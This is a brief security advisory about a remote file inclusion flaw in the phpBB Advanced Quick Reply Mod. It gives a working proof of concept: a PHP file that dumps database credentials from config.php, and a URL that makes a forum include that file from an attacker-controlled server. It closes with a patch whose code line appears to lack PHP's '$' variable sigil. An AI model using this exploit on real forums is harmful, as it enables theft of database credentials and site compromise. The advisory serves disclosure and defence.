Hai Nam Luke has found a security hole in the phpBB Advanced Quick Reply Mod (Code Injection). Attackers can exploit this Mod to inject PHP code into an existing forum, effectively compromising the site's integrity.
Credit:
The information has been provided by Hai Nam Luke.
If you create a file called 'extension.inc' and include in it for example:
<?php
include('config'.'.php');
echo "DB Type: $dbms <br>";
echo "DB Host: $dbhost <br>";
echo "DB Name: $dbname <br>";
echo "DB User: $dbuser <br>";
echo "DB Pass: $dbpasswd <br>";
exit;
?>
Accessing the file by issuing the following URL: http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your Server]/&mode=smiles
Will return the server's database username and password.
Patch:
Modify in quick_reply.php the following:
[FIND] if ( $mode == 'smilies' )
{
[ADD BEFORE] phpbb_root_path = "./";
